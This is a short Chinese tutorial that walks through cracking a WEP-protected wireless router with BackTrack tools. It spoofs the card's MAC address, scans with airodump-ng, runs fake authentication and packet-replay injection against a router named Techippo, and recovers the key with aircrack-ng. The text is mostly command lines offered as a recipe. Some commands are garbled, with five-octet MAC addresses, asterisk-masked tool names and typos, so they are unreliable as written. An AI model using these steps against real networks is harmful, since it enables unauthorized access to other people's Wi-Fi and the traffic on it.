由于无线网络的飞速发展,时下好多个人都用起了无线路由器,默认状态下无线路由是用WEP加密的,但稍有常识的人都会知道, WEP非常特别以及极其的不安全,下面我就用BT工具来做个实验,仅仅是实验。BT是BackTrack的缩写,它是基于Slackware和SLAX的自启动运行光盘,它包含了一套安全及计算机取证工具。它其实是依靠融合Auditor Security Linux和WHAX(先前的Whoppix)而创建成的。 里面集成了好多黑客工具,非常强大。废话就不多说了,破解开始：
　　1. 修改无线网卡的MAC地址
　　airmon-ng //返回 无线网卡列表
　　airmon-ng stop wifi0 //停止无线网卡
　　ifconfig wif0 down //停止无线网络
　　macchanger -m 00:11:22:33:44:55 wifi0 //修改网卡的mac地址
　　airmon-ng start wifi0 //修改后启动,应该是两个无线网卡,例如：ath0
　　2. 查找无线网络
　　airodump
[续上]-ng ath0 //成功后会出现一个列表,而且不断的有pack进出,然后ctrl+c停止
　　3. 抓包
　　这里我先假设测试的无线路由名字(ESSID)叫Techippo,频道：11,MAC地址(BSSID)：88：88：88：88：88：88
　　airodump-ng -c 11 -w dump –bssid 88:88:88:88:88 ath0 //dump为包的名字可随意命名
　　新开一个Shelll
　　ai*-ng -1 0 -e Techippo -b 88:88:88:88:88 -h 00:11:22:33:44:55 ath0
　　运行完这条命令后会显示关联成功,成功后才可以进行*步操作,如果提示关联不成功有可能是信号太弱或者网卡不支持。
　　接下来在运行下面这条命令,抓包开始。不要关闭这个shell。
　　ai*-ng -3 -b 88:88:88:88:88 -h 00:11:22:33:44:55 ath0
　　4. 破解
　　再重新开一个Shell。运行下面这条命令。[续上]　　aircrack-ng -n 64 -b 88:88:88:88:88 dump-01.cap
　　破解开始,在接下来出现的Key Found：后面显示的就是该无线路由的密码。